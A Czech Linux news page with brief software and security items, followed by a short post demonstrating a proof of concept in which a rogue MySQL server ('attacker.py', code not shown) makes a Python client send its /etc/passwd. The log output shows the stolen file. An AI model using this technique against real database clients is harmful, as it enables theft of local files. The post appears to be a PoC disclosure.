Příspěvek na blogu Codean Labs rozebírá zranitelnost CVE-2024-4367 v PDF.js, tj. mj. prohlížeči PDF souborů ve Firefoxu. Při otevření útočníkem připraveného pdf souboru může být spuštěn libovolný kód v JavaScriptu. Vyřešeno ve Firefoxu 126.
Lazygit byl vydán ve verzi 0.42.0. Jedná se o TUI (Text User Interface) nadstavbu nad gitem.
K open source herní konzole Picopad přibyla (𝕏) vylepšená verze Picopad Pro s větším displejem, lepšími tlačítky a větší baterii. Na YouTube lze zhlédnout přednášku Picopad - open source herní konzole z LinuxDays 2023.
Byla vydána (𝕏) nová major verze 17 softwarového nástroje s webovým rozhraním umožňujícího spolupráci na zdrojových kódech GitLab (Wikipedie). Představení nových vlastností i s náhledy a videi v oficiálním oznámení.
Sovereign Tech Fund, tj. program financování otevřeného softwaru německým ministerstvem hospodářství a ochrany klimatu, podpoří vývoj FFmpeg částkou 157 580 eur. V listopadu loňského roku podpořil GNOME částkou 1 milion eur.
24. září 2024 budou zveřejněny zdrojové kódy přehrávače Winamp.
Google Chrome 125 byl prohlášen za stabilní. Nejnovější stabilní verze 125.0.6422.60 přináší řadu oprav a vylepšení (YouTube). Podrobný přehled v poznámkách k vydání. Opraveno bylo 9 bezpečnostních chyb. Vylepšeny byly také nástroje pro vývojáře.
Textový editor Neovim byl vydán ve verzi 0.10 (𝕏). Přehled novinek v příspěvku na blogu a v poznámkách k vydání.
Byla vydána nová verze 6.3 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Přehled změn v příslušném seznamu. Tor Browser byl povýšen na verzi 13.0.15.
Dnes ve 12:00 byla spuštěna první aukce domén .CZ. Zatím největší zájem je o dro.cz, kachnicka.cz, octavie.cz, uvycepu.cz a vnady.cz [𝕏].
Byly zveřejněny informace o bezpečnostní chybě v nástroji pro správu databází v jednom PHP souboru Adminer. Chyba je už půl roku opravena. Stačí Adminer aktualizovat.
Tiskni Sdílej:
attacker.py
.
Oběť:
Python 3.7.2 (default, Jan 3 2019, 02:55:40) [GCC 8.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import MySQLdb >>> connection = MySQLdb.Connect(host='127.0.0.1', user='nsa', passwd='litomerice', db='catchmeifyoucan') Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/lib/python3/dist-packages/MySQLdb/__init__.py", line 86, in Connect return Connection(*args, **kwargs) File "/usr/lib/python3/dist-packages/MySQLdb/connections.py", line 266, in __init__ self.autocommit(autocommit) File "/usr/lib/python3/dist-packages/MySQLdb/connections.py", line 272, in autocommit _mysql.connection.autocommit(self, on) _mysql_exceptions.OperationalError: (2013, 'Lost connection to MySQL server during query') >>>Útočník vidí:
ACCEPT: ('127.0.0.1', 40422) > server greeting plen 204 received data: b'\x01\x8c\xa2\x9f\x00\x00\x00\x00@\x08\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00nsa\x00\x14\xd7\xfd \xdbj\x11\xe5\x8f\x14\x89\xeaa\x8a\xaf\xf2\xcc\x91\xea\xf7\xe0\xc4catchmeifyoucan\x00mysql_native_password\x00k\x03_os\x05Linux\x0c_client_name\nlibmariadb\x04_pid \x0519516\x0f_client_version\x053.0.8\t_platform\x06x86_64\x0c_server_host\t127.0.0.1' > auth accept plen 18 received data: b'\x00\x03SET autocommit=0' > exploit plen 3632 received data: b'\x02root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon: /usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys: [...]Testováno na aktuálních verzích v Debianu Unstable, je mi úplně fuk že to je binárně nekompatibilní s okolním světem, a taky je mi fuk, že to u oběti hodí exception a tudíž pokud to použijete v produkci, tak si toho všimne. Je to Poc.